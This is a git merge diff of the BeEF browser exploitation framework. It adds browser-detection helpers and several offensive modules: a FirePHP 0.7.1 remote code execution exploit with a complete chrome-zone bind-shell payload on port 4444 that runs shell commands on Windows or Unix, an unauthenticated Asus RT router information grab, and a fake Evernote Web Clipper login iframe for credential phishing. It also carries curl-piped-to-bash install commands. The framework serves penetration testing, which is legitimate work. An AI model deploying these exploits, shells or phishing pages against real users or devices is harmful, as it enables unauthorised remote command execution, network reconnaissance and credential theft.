Merge branch 'master' of git://github.com/beefproject/beef

INSTALL.txt

@@ -51,8 +51,8 @@ Installation
       - XCode: provides the sqlite support BeEF needs
       
       - Ruby 1.9
-      	To install RVM and Ruby 1.9.3 on Mac OS:  
-      	$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile 
+      	To install RVM and Ruby 1.9.3 on Mac OS:
+      	$ bash -s stable < <(curl -Ls https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
       	$ rvm install 1.9.3-p484
 		$ rvm use 1.9.3
       

README

@@ -48,7 +48,7 @@ __The following is for the impatient.__
 For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
 We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
 
-   $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
+   $ bash -s stable < <(curl -Ls https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
 
 
 Usage 

README.mkd

@@ -48,7 +48,7 @@ __The following is for the impatient.__
 For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
 We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
 
-       $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
+       $ curl -L https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
 
 
 Usage 

core/main/client/browser.js

@@ -333,12 +333,28 @@ beef.browser = {
         return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/29./) != null;
     },
 
+    /**
+     * Returns true if FF30
+     * @example: beef.browser.isFF30()
+     */
+    isFF30: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/30./) != null;
+    },
+
+    /**
+     * Returns true if FF31
+     * @example: beef.browser.isFF31()
+     */
+    isFF31: function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/31./) != null;
+    },
+
     /**
      * Returns true if FF.
      * @example: beef.browser.isFF()
      */
     isFF: function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29();
+        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31();
     },
 
     /**
@@ -922,6 +938,8 @@ beef.browser = {
             FF27: this.isFF27(), // Firefox 27
             FF28: this.isFF28(), // Firefox 28
             FF29: this.isFF29(), // Firefox 29
+            FF30: this.isFF30(), // Firefox 30
+            FF31: this.isFF31(), // Firefox 31
             FF: this.isFF(),   // Firefox any version
 
             IE6: this.isIE6(), // Internet Explorer 6
@@ -1274,6 +1292,14 @@ beef.browser = {
             return '29'
         }
         ;   // Firefox 29
+        if (this.isFF30()) {
+            return '30'
+        }
+        ;   // Firefox 30
+        if (this.isFF31()) {
+            return '31'
+        }
+        ;   // Firefox 31
 
         if (this.isIE6()) {
             return '6'

install-beef

@@ -41,7 +41,7 @@ fi
 if [ "$OS" == "Darwin" ]; then
 	echo "Mac OSX Detected"
 	echo "Installing Ruby Version Manager (RVM) & Ruby 1.9.3.."
-	bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) 
+	bash -s stable < <(curl -Ls https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
 	source ~/.bash_login
 	rvm install 1.9.3-p0 --with-gcc=clang
 	rvm use 1.9.3-p0
@@ -78,7 +78,7 @@ if [ "$Distro" == "Debian" ]; then
 
 sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion
 
-curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
+curl -Lsk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
 
 echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc
 

liveCD/BeEFLive.sh

@@ -175,6 +175,14 @@ show_menu() {
 				 sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
 				 sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
 				 echo ""
+				 echo "Creating beef user..."
+				 sudo useradd -d /home/beef -m beef
+				 sudo adduser beef sudo
+				 sudo chsh -s /bin/bash beef
+				 sudo chown -R beef:beef /opt/beef/
+				 sudo chown -R beef:beef /opt/metasploit-framework/
+				 sudo chown -R beef:beef /opt/sqlmap/
+				 echo ""
 				 echo "Please provide a password for ssh user: beef"
 				 sudo passwd beef
 				 echo "ssh enabled"

modules/browser/detect_evernote_clipper/command.js

@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	var result = "";
+
+	var s = document.createElement('script');
+	s.onload = function() {
+		result = "Detected through presense of extension content script.";
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper="+result);
+	}
+	s.src = 'chrome-extension://pioclpoplcdbaefihamjohnefbikjilc/content/frame.js';
+	document.body.appendChild(s);
+
+	var evdiv = document.getElementById('evernoteGlobalTools');
+	if (typeof(evdiv) != 'undefined' && evdiv != null) {
+		// Evernote Web Clipper must have been active as well, because we can detect one of the iFrames
+		iframeresult = "Detected evernoteGlobalTools iFrame. Looks like the Web Clipper has been used on this page";
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper="+iframeresult);
+	}
+
+
+	setTimeout(function() {
+		if (result == "") {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper=Not Detected");
+		}	
+		document.body.removeChild(s);
+		}, 2000);
+
+});
+

modules/browser/detect_evernote_clipper/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_evernote_clipper:
+            enable: true
+            category: "Browser"
+            name: "Detect Evernote Web Clipper"
+            description: "This module checks if the Evernote Web Clipper extension is installed and active."
+            authors: ["xntrik"]
+            target:
+                 not_working: ["IE"]
+                 working: ["C"]

modules/browser/detect_evernote_clipper/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_evernote_clipper < BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content['evernote_clipper'] = @datastore['evernote_clipper'] if not @datastore['evernote_clipper'].nil?
+		save content
+	end
+
+end

modules/browser/hooked_domain/rickroll/command.js

@@ -9,8 +9,7 @@ beef.execute(function() {
 
 	$j('body').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
 	$j('html').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
-	
-	$j('body').html('<object width="100%" height="100%"><param name="movie" value="http://www.youtube.com/v/oHg5SJYRHA0?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/oHg5SJYRHA0?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="100%" height="100%"></object>');
-	
+
+        $j('body').html('<iframe width="100%" height="100%" src="//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1" frameborder="0" allowfullscreen></iframe>');
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Rickroll Successful");
 });

modules/browser/remove_hook_element/command.js

@@ -0,0 +1,29 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	/**
+	 * Removes the BeEF hook.js
+	 * @return: true if the hook.js script is removed from the DOM
+	 */
+	var removeHookElem = function() {
+		var removedFrames = $j('script[src*="'+beef.net.hook+'"]').remove();
+		if (removedFrames.length > 0) {
+			return true;
+		} else {
+			return false;
+		}
+	}
+
+	if (removeHookElem() == true) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=successfully removed the hook script element");
+	} else {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=something did not work");
+	}
+
+});
+

modules/browser/remove_hook_element/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        remove_hook_element:
+            enable: true
+            category: "Browser"
+            name: "Remove Hook Element"
+            description: "This module removes the BeEF hook script element from the hooked page, but the underlying BeEF DOM object remains."
+            authors: ["xntrik"]
+            target:
+                 working: ["All"]

modules/browser/remove_hook_element/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Remove_hook_element < BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content["result"] = @datastore["result"] if not @datastore["result"].nil?
+		save content
+	end
+
+end

modules/exploits/firephp/command.js

@@ -0,0 +1,26 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+  // detect firebug
+  if (window.console && (window.console.firebug || window.console.exception)) {
+    var firephp_<%= @command_id %> = beef.dom.createInvisibleIframe();
+    firephp_<%= @command_id %>.src = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + "/firephp";
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+  } else {
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=Module did not run. Firebug is not open in the hooked browser.");
+    return;
+  }
+
+  // clean up
+  cleanup = function() {
+     document.body.removeChild(firephp_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", 10000);
+
+});
+

modules/exploits/firephp/config.yaml

@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+###
+# Exploit: http://www.justanotherhacker.com/advisories/jahx132.html
+###
+beef:
+    module:
+        firephp_code_exec:
+            enable: true
+            category: "Exploits"
+            name: "Firephp 0.7.1 RCE"
+            description: "Exploit FirePHP <= 0.7.1 to execute arbitrary JavaScript within the trusted 'chrome://' zone.<br/><br/>This module forces the browser to load '/firephp' on the BeEF server.<br/><br/>The payload is executed silently once the user moves the mouse over the array returned for 'http://[BeEF]/firephp' in Firebug.<br/><br/><b>Note:</b> Use msfpayload to generate JavaScript payloads. The default payload binds a shell on port 4444.<br/>See 'modules/exploits/firephp/payload.js'"
+            authors: ["Wireghoul", "bcoles"]
+            target:
+                user_notify: ["FF"]
+                not_working: ["All"]

modules/exploits/firephp/module.rb

@@ -0,0 +1,59 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
+###
+class Firephp_code_exec < BeEF::Core::Command
+
+  def pre_send
+    rand_str = rand(32**10).to_s(32)
+
+    # load payload.js file
+    # generate payload:
+    #  msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js
+    payload = ""
+    f = File.open("#{$root_dir}/modules/exploits/firephp/payload.js")
+    f.each_line do |line|
+      payload << line
+    end
+    f.close
+
+    # construct exploit+payload HTTP response
+    exploit = {
+      "RequestHeaders" => {
+        "1"=>"#{rand(10)}",
+        "2"=>"#{rand(10)}",
+        "3"=>"#{rand(10)}",
+        "4"=>"#{rand(10)}",
+        "5"=>"#{rand(10)}",
+        "6"=>"#{rand(10)}",
+        "7"=>"#{rand(10)}",
+        "8"=>"#{rand(10)}",
+        "9"=>"#{rand(10)}",
+        "<script>#{payload}<\/SCRIPT>" => rand_str
+      }
+    }.to_json
+
+    # mount exploit+payload at /firephp
+    # @todo use Router class instead of bind_raw()
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',
+      {
+        'Content-Type'       => 'text/html',
+        'X-Wf-Protocol-1'    => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
+        'X-Wf-1-Plugin-1'    => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',
+        'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',
+        'X-Wf-1-1-1-1'       => "#{exploit.length}|#{exploit}|\r\n"
+      },
+      rand_str,   # HTTP body
+      '/firephp', # URI mount point
+      -1
+    )
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end

modules/exploits/firephp/payload.js

@@ -0,0 +1,168 @@
+(function(){
+
+      Components.utils.import("resource://gre/modules/NetUtil.jsm");
+      var lport = 4444;
+      var rhost = "";
+      var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"]
+                             .createInstance(Components.interfaces.nsIServerSocket);
+      serverSocket.init(lport, false, -1);
+
+      var listener = {
+        onSocketAccepted: function(serverSocket, clientSocket) {
+          var outStream = clientSocket.openOutputStream(0, 0, 0);
+          var inStream = clientSocket.openInputStream(0, 0, 0);
+          var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
+                     .createInstance(Components.interfaces.nsIInputStreamPump);
+          pump.init(inStream, -1, -1, 0, 0, true);
+          pump.asyncRead(clientListener(outStream), null);
+        }
+      };
+
+      var clientListener = function(outStream) {
+        return {
+          onStartRequest: function(request, context) {},
+          onStopRequest: function(request, context) {},
+          onDataAvailable: function(request, context, stream, offset, count) {
+            var data = NetUtil.readInputStreamToString(stream, count).trim();
+            runCmd(data, function(err, output) {
+              if(!err) outStream.write(output, output.length);
+            });
+          }
+        };
+      };
+
+      
+      
+      var readFile = function(path) {
+        try {
+          var file = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+          file.initWithPath(path);
+
+          var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
+                           .createInstance(Components.interfaces.nsIFileInputStream);
+          fileStream.init(file, 1, 0, false);
+
+          var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
+                             .createInstance(Components.interfaces.nsIBinaryInputStream);
+          binaryStream.setInputStream(fileStream);
+          var array = binaryStream.readByteArray(fileStream.available());
+
+          binaryStream.close();
+          fileStream.close();
+          file.remove(true);
+
+          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");
+        } catch (e) { return ""; }
+      };
+    
+      
+      var setTimeout = function(cb, delay) {
+        var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
+        timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
+        return timer;
+      };
+    
+
+      var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
+        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+      var windows = (ua.indexOf("Windows")>-1);
+      var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
+      var jscript = ({"src":"\n      var b64 = WScript.arguments(0);\n      var dom = new ActiveXObject(\"MSXML2.DOMDocument.3.0\");\n      var el  = dom.createElement(\"root\");\n      el.dataType = \"bin.base64\"; el.text = b64; dom.appendChild(el);\n      var stream = new ActiveXObject(\"ADODB.Stream\");\n      stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);\n      stream.Position=0; stream.type=2; stream.CharSet = \"us-ascii\"; stream.Position=0;\n      var cmd = stream.ReadText();\n      (new ActiveXObject(\"WScript.Shell\")).Run(cmd, 0, true);\n    "}).src;
+      var runCmd = function(cmd, cb) {
+        cb = cb || (function(){});
+
+        if (cmd.trim().length == 0) {
+          setTimeout(function(){ cb("Command is empty string ('')."); });
+          return;
+        }
+
+        var js = (/^\s*\[JAVASCRIPT\]([\s\S]*)\[\/JAVASCRIPT\]/g).exec(cmd.trim());
+        if (js) {
+          var tag = "[!JAVASCRIPT]";
+          var sync = true;  /* avoid zalgo's reach */
+          var sent = false;
+          var retVal = null;
+
+          try {
+            retVal = Function('send', js[1])(function(r){
+              if (sent) return;
+              sent = true;
+              if (r) {
+                if (sync) setTimeout(function(){ cb(false, r+tag+"\n"); });
+                else      cb(false, r+tag+"\n");
+              }
+            });
+          } catch (e) { retVal = e.message; }
+
+          sync = false;
+
+          if (retVal && !sent) {
+            sent = true;
+            setTimeout(function(){ cb(false, retVal+tag+"\n"); });
+          }
+
+          return;
+        }
+
+        var shEsc = "\\$&";
+        var shPath = "/bin/sh -c";
+
+        if (windows) {
+          shPath = "cmd /c";
+          shEsc = "\^$&";
+          var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
+            .getService(Components.interfaces.nsIProperties)
+            .get("TmpD", Components.interfaces.nsIFile);
+          jscriptFile.append('DgPpX5C0Cqj8lWozDd.js');
+          var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
+            .createInstance(Components.interfaces.nsIFileOutputStream);
+          stream.init(jscriptFile, 0x04 | 0x08 | 0x20, 0666, 0);
+          stream.write(jscript, jscript.length);
+          if (stream instanceof Components.interfaces.nsISafeOutputStream) {
+            stream.finish();
+          } else {
+            stream.close();
+          }
+        }
+
+        var stdoutFile = "Bf6Seq5KPkR5MZLH";
+
+        var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
+          .getService(Components.interfaces.nsIProperties)
+          .get("TmpD", Components.interfaces.nsIFile);
+        stdout.append(stdoutFile);
+
+        if (windows) {
+          var shell = shPath+" "+cmd;
+          shell = shPath+" "+shell.replace(/\W/g, shEsc)+" >"+stdout.path+" 2>&1";
+          var b64 = svcs.btoa(shell);
+        } else {
+          var shell = shPath+" "+cmd.replace(/\W/g, shEsc);
+          shell = shPath+" "+shell.replace(/\W/g, shEsc) + " >"+stdout.path+" 2>&1";
+        }
+        var process = Components.classes["@mozilla.org/process/util;1"]
+          .createInstance(Components.interfaces.nsIProcess);
+        var sh = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+
+        if (windows) {
+          sh.initWithPath("C:\\Windows\\System32\\wscript.exe");
+          process.init(sh);
+          var args = [jscriptFile.path, b64];
+          process.run(true, args, args.length);
+          jscriptFile.remove(true);
+          setTimeout(function(){cb(false, cmd+"\n"+readFile(stdout.path));});
+        } else {
+          sh.initWithPath("/bin/sh");
+          process.init(sh);
+          var args = ["-c", shell];
+          process.run(true, args, args.length);
+          setTimeout(function(){cb(false, readFile(stdout.path));});
+        }
+      };
+    
+
+      serverSocket.asyncListen(listener);
+
+})();

modules/exploits/router/asus_rt_series_get_info/command.js

@@ -0,0 +1,48 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var target_ip = '<%= @target_ip %>'; 
+
+  load_script = function(url) {
+    var s = document.createElement("script");
+    s.type = 'text/javascript';
+    s.src  = url;
+    document.body.appendChild(s);
+  }
+
+  get_info = function() {
+
+    beef.debug(target_ip + " - gathering info...");
+
+    var clients = Client_IP_MAC;
+    var wanip   = wanlink_ipaddr();
+    var netmask = wanlink_netmask();
+    var gateway = wanlink_gateway();
+    var dns     = wanlink_dns();
+
+    beef.debug(target_ip + " - Clients: " + clients);
+    beef.debug(target_ip + " - WAN IP: "  + wanip);
+    beef.debug(target_ip + " - Gateway: " + gateway);
+    beef.debug(target_ip + " - DNS: "     + dns);
+    beef.debug(target_ip + " - gathering info completed");
+
+    beef.net.send("<%= @command_url %>", <%= @command_id %>,
+      "clients="  + clients +
+      "&wanip="   + wanip   +
+      "&netmask=" + netmask +
+      "&gateway=" + gateway + 
+      "&dns="     + dns
+    );
+  }
+
+  beef.debug(target_ip + " - loading scripts...");
+  load_script("http://" + target_ip + "/status.asp");
+  load_script("http://" + target_ip + "/get_wan_status.asp");
+  setTimeout("get_info()", 10000);
+
+});
+

modules/exploits/router/asus_rt_series_get_info/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        asus_rt_series_get_info:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Asus RT Series Get Info"
+            description: "This module retieves information from an Asus RT series router unauthenticated. The information retrieved includes all connected LAN clients (MAC address and LAN IP) and WAN link details (WAN IP address, gateway, DNS server)."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/exploits/router/asus_rt_series_get_info/module.rb

@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Asus_rt_series_get_info < BeEF::Core::Command
+
+  def self.options
+    return [
+      { 'name' => 'target_ip', 'ui_label' => 'Target IP', 'value' => '192.168.1.1' }
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end
+

modules/social_engineering/fake_evernote_clipper/command.js

@@ -0,0 +1,30 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// Prepare the onmessage event handling
+	var eventMethod = window.addEventListener ? "addEventListener" : "attachEvent";
+	var eventer = window[eventMethod];
+	var messageEvent = eventMethod == "attachEvent" ? "onmessage" : "message";
+	eventer(messageEvent,function(e) {
+		if (e.data == "KILLFRAME") {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Killing Frame');	
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'meta=KILLFRAME');	
+			beef.dom.removeElement('EVIFRAME');
+			return;
+		} else {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=' + e.data);	
+		}
+	},false);	
+
+	if (beef.browser.isC()) {
+		beef.dom.createIframe('custom', {'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/ev/login.html','id':'EVIFRAME'}, {'width':'317px','height':'336px','position':'fixed','right':'0px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'0px','overflow':'hidden'}); 
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Chrome IFrame Created .. awaiting messages');	
+	} 
+
+
+});

modules/social_engineering/fake_evernote_clipper/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        fake_evernote_clipper:
+            enable: true
+            category: "Social Engineering"
+            name: "Fake Evernote Web Clipper Login"
+            description: "Displays a fake Evernote Web Clipper login dialog."
+            authors: ["xntrik"]
+            target:
+                user_notify: ['C']

modules/social_engineering/fake_evernote_clipper/login.css

@@ -0,0 +1,466 @@
+body {
+  font-size: 11px;
+  font-style: normal;
+  overflow: hidden;
+  -webkit-font-smoothing: antialiased;
+  -webkit-user-select: none;
+}
+
+* {
+  background-repeat: no-repeat;
+  color: inherit;
+  font: inherit;
+  text-shadow: inherit;
+  -webkit-font-smoothing: inherit;
+}
+
+textarea {
+  resize: none;
+}
+
+a {
+  text-decoration: none;
+}
+
+.tab {
+  cursor: pointer;
+  display: inline-block;
+  height: 26px;
+  vertical-align: top;
+}
+.tab.pressed {
+  background-image: url(../images/clip_result_arrow.png);
+  background-size: 16px 8px;
+}
+
+.pinch {
+  background-color: #2F373D;
+  border-top: 1px solid #272D33;
+  border-bottom: 1px solid #272D33;
+  margin-top: -1px;
+}
+
+input[type=radio], input[type=checkbox] {
+  display: none;
+}
+label {
+  cursor: pointer;
+  display: inline-block;
+  vertical-align: top;
+}
+input[type=radio] + label:before {
+  background-image: url(../images/radio.png);
+  background-repeat: no-repeat;
+  background-size: 16px 16px;
+  content: "";
+  display: inline-block;
+  height: 16px;
+  width: 16px;
+}
+input[type=radio]:checked + label:before {
+  background-image: url(../images/radio-dot.png), url(../images/radio.png);
+  background-position: 5px, 0;
+  background-size: 6px 7px, 16px 16px;
+}
+input[type=radio] + label {
+  height: 16px;
+  line-height: 16px;
+}
+
+input[type=checkbox] + label:before {
+  background-color: #737F89;
+  border: 1px solid #232A31;
+  border-radius: 4px;
+  content: "";
+  display: inline-block;
+  height: 20px;
+  width: 20px;
+}
+input[type=checkbox]:checked + label:before {
+  background-image: url(../images/checkmark-big.png);
+  background-position: 50% 5px;
+  background-repeat: no-repeat;
+  background-size: 14px 12px;
+}
+input[type=checkbox] + label {
+  height: 22px;
+  line-height: 22px;
+}
+
+select {
+  background-color: white;
+  background-image: url(../images/icon_down_padded.png);
+  background-position: -webkit-calc(100% - 10px) 50%;
+  background-size: 8px 5px;
+  border: 1px solid #232A30;
+  border-radius: 3px;
+  color: #3A4045;
+  font-family: "GothamMedium", Helvetica, Arial, sans-serif;
+  font-size: 11px;
+  line-height: 24px;
+  margin: 0;
+  outline: none;
+  padding: 0 28px 0 10px;
+  text-shadow: none;
+  -webkit-appearance: button;
+}
+
+@font-face {
+  font-family: "CaeciliaBold";
+  src: url(../fonts/caecilialtstd-bold-webfont.woff) format('woff');
+}
+@font-face {
+  font-family: "CaeciliaRoman";
+  src: url(../fonts/caecilialtstd-roman-webfont.woff) format('woff');
+}
+@font-face {
+  font-family: "GothamBook";
+  src: url(../fonts/GothamSSm-Book.otf) format('opentype');
+}
+@font-face {
+  font-family: "GothamMedium";
+  src: url(GothamSSm-Medium.otf) format('opentype');
+}
+@font-face {
+  font-family: "GothamBold";
+  src: url(GothamSSm-Bold.otf) format('opentype');
+}
+
+@media (-webkit-min-device-pixel-ratio: 1.5) {
+  .tab.pressed {
+    background-image: url(../images/clip_result_arrow@2x.png);
+  }
+  input[type=radio] + label:before {
+    background-image: url(../images/radio@2x.png);
+  }
+  input[type=radio]:checked + label:before {
+    background-image: url(../images/radio-dot@2x.png), url(../images/radio@2x.png);
+  }
+  input[type=checkbox]:checked + label:before {
+    background-image: url(../images/checkmark-big@2x.png);
+  }
+  select {
+    background-image: url(../images/icon_down_padded@2x.png);
+  }
+}
+
+a {
+  text-decoration: none;
+}
+
+body {
+  border: 1px solid #21262C;
+  border-radius: 5px;
+  margin: 2px;
+}
+
+#main {
+  background-color: #2F373D;
+  border-radius: 4px;
+  padding: 22px 28px;
+}
+
+#logo {
+  background-image: url(clipboard.png), url(evernote_web_clipper.png);
+  background-position: -10px -10px, 48px 1px;
+  background-size: 58px 58px, 134px 36px;
+  cursor: pointer;
+  height: 58px;
+}
+#logo.china {
+  background-image: url(clipboard.png), url(../../images/evernote_web_clipper_china.png);
+  background-position: -10px -10px, 43px 1px;
+  background-size: 58px 58px, 48px 47px;
+}
+
+#close {
+  background-image: url(close_login.png);
+  background-size: 8px 8px;
+  cursor: pointer;
+  height: 8px;
+  outline: none;
+  position: absolute;
+  right: 6px;
+  top: 6px;
+  width: 8px;
+}
+
+.inputContainer {
+  position: relative;
+}
+input {
+  background-color: #EAF0F5;
+  border: 1px solid #21262C;
+  border-radius: 3px;
+  color: #3A4045;
+  font-family: "GothamMedium", Helvetica, Arial, sans-serif;
+  font-size: 12px;
+  height: 36px;
+  margin-bottom: 16px;
+  max-width: 236px;
+  outline: none;
+  padding: 10px;
+  text-shadow: none;
